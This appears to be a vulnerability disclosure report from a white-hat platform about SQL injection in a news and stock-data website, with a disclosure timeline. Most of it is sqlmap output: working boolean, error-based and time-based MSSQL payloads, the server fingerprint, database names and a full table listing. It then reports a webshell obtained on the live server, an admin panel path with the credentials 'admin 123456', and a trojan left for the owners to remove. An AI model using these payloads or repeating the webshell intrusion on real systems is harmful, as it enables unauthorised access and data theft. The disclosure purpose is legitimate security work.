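2015-10-30: Details reported to the vendor; awaiting vendor handling
2015-11-04: Vendor confirmed; details disclosed to the vendor only
2015-11-14: Details disclosed to core white hats and experts in related fields
2015-11-24: Details disclosed to regular white hats
2015-12-04: Details disclosed to intern white hats
2015-12-19: Details disclosed to the public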
- -
Injection points
http://**.**.**.**/News/Default.aspx?Kind=c00001
http://**.**.**.**/hk/industrymore.aspx?q=Block
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: Kind (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Kind=c00001' AND 4379=4379 AND 'nWHD'='nWHD

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Kind=c00001' AND 9281=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9281=9281) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(122)+CHAR(113))) AND 'FGZO'='FGZO

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: Kind=c00001' AND 8769=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'OYYN'='OYYN
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [14]:
[*] His_TTGame
[*] master
[*] model
[*] msdb
[*] News
[*] newstmpmessage
[*] ReportServer
[*] ReportServerTempDB
[*] SHEX_Game
[*] StockData
[*] tempdb
[*] Tsci_tt
[*] tt180
[*] TTGame

Database: News
+----------------------------------+---------+
| Table                            | Entries |
+----------------------------------+---------+
| dbo.NS_MessageKinds_bak201508    | 1168587 |
| dbo.ObjectRelation               | 1069242 |
| dbo.NS_MessageKinds              | 466832  |
| dbo.NS_Message                   | 323364  |
| dbo.NS_Announcement              | 264046  |
| dbo.Channel_Message              | 195370  |
| dbo.NS_US_news                   | 139042  |
| dbo.NS_PickMessage               | 124636  |
| dbo.View_KindNews                | 120312  |
| dbo.NS_MessageKinds_bakJanyo     | 105599  |
| dbo.NS_PickMessageHistory        | 101098  |
| dbo.NS_MessageKinds20130523      | 94807   |
| dbo.Query                        | 87429   |
| dbo.TT_HKNotice                  | 86563   |
| dbo.UserSubscribeChannel         | 54730   |
| dbo.TMP_PickMessage              | 31699   |
| dbo.tmpall                       | 23181   |
| dbo.TT_News_Hot                  | 11734   |
| dbo.NS_RecordLog                 | 4512    |
| dbo.view_NewsLists               | 3322    |
| dbo.TT_User                      | 3041    |
| dbo.TT_User_bak                  | 2457    |
| dbo.stockcode                    | 2022    |
| dbo.tempNS_PickMessage           | 1921    |
| dbo.TT_CustomSTK                 | 1834    |
| dbo.News_Comments                | 1228    |
| dbo.HotNewstag                   | 1065    |
| dbo.NS_NewsSendMsg               | 1035    |
| dbo.TT_HKNotice_bak              | 1000    |
| dbo.FocusNews                    | 791     |
| dbo.view_EveryDayEditCountByUser | 393     |
| dbo.TT_BBS                       | 298     |
| dbo.view_jyb_news_comments       | 246     |
| dbo.TT_User_Do                   | 245     |
| dbo.GeneralWords                 | 238     |
| dbo.CommonChannel                | 191     |
| dbo.view_jyb_hotNews             | 42      |
| dbo.NS_NewsPageSettings          | 31      |
| dbo.tmpaaaaa                     | 22      |
| dbo.V_PageSetings                | 20      |
| dbo.NS_Admin                     | 19      |
| dbo.Company                      | 15      |
| dbo.NS_subKinds                  | 15      |
| dbo.View_IM_CompanyLists         | 12      |
| dbo.LSB                          | 11      |
| dbo.NS_NewsMoveStat              | 8       |
| dbo.tempExceptHot                | 7       |
| dbo.D99_REG                      | 1       |
| dbo.NS_UserGetEditPickNews       | 1       |
+----------------------------------+---------+
Getshell; admin backend address
http://**.**.**.**/admin/Default.aspx
admin 123456
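So many databases
It looks like internal network penetration is possible - - Please remove the trojan yourselves; I did not download anything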
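Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2015-11-04 14:32
No direct handling channel with the site's operating organization has been established yet; awaiting claim.
None yet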